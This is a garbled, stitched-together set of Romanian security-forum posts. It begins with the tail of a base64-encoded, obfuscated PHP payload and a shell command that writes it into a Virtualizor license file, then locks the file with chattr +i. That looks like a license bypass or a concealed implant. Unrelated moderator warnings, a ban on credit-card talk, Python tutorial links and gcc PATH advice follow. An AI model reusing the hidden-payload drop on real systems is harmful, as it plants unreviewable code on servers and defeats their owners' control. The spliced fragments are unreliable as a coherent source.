KUrBehqiAWuY9IySjVqUB4/K2KeWSG8K96dlF7Ml+8h/QIRx+9AvIfrpvk+bhNX3dUrfy3/ECA7AL7XthwoIohf3Lhzp8lO3y4IMERRL/P6Qv0PeDHYhuFgtfsTFr7mwkWbURQmsQz/Nrj8sV4fcPTyMEj48Fh7ViZEvAJY0CNpRFIEghQE/0rXOE7yE//7rr7/++vcf//z9n3/+Dw=='))); ?> EOF` echo $php_cwd > /usr/local/virtualizor/license.php chattr +i /usr/local/virtualizor/license.php
RST nu e taraba ta de vandut servere. Putin imi pasa de cine ti-a inchis threadurile dar sa vi si sa te apuci de injurat e prea mult, poti sa intrebi si frumos. Nu-mi pasa cat de bune sunt serviciile pe care le oferi si ce parere au clientii. Nu ti se pare normal sa respecti comunitatea din care iti iei clientii? Warn pentru limbaj "colorat".
La cat cod ai pus aici nu cred ca isi da cineva seama ce vrei sa faci si mai ales cum vrei sa faci. Pune si tu codul complet.
Bine ai venit. Da o tura pe la regulament si pe la sectiunile de tutoriele. Incearca sa nu mai maltratezi limba romana.
Sa nu va mai prind cu detalii despre CC pe aici! Nu ma intereseaza ca sunt fake sau nu.
Python Tutorials for Kids 8+ | Let's learn Python! Getting started: Getting Started | Python Tutorials for Kids 8+ Primul tutorial din serie: Hello world! | Python Tutorials for Kids 8+
@StrXt si Worm32 Se pare ca limita de utilizatori a fost atinsa, de asta nu va puteti face cont chiar daca aveti invitatie. O sa las codurile de invite active si mai incercat voi din cand in cand, poate se mai fac locuri. Sorry, nu stiam ca e full.
Daca folosesti cygwin trebuie sa ai grija sa fie gcc in path. Incearca sa-l rulezi din consola sa vezi daca iti recunoaste comanda. Daca scrii in consola gcc si iti zice ca nu e recunoscuta comanda insemna ca nu ai setat PATH pentru gcc. Ca si alternative poti sa folosesti visual studio sau Code :: Blocks cu mingw.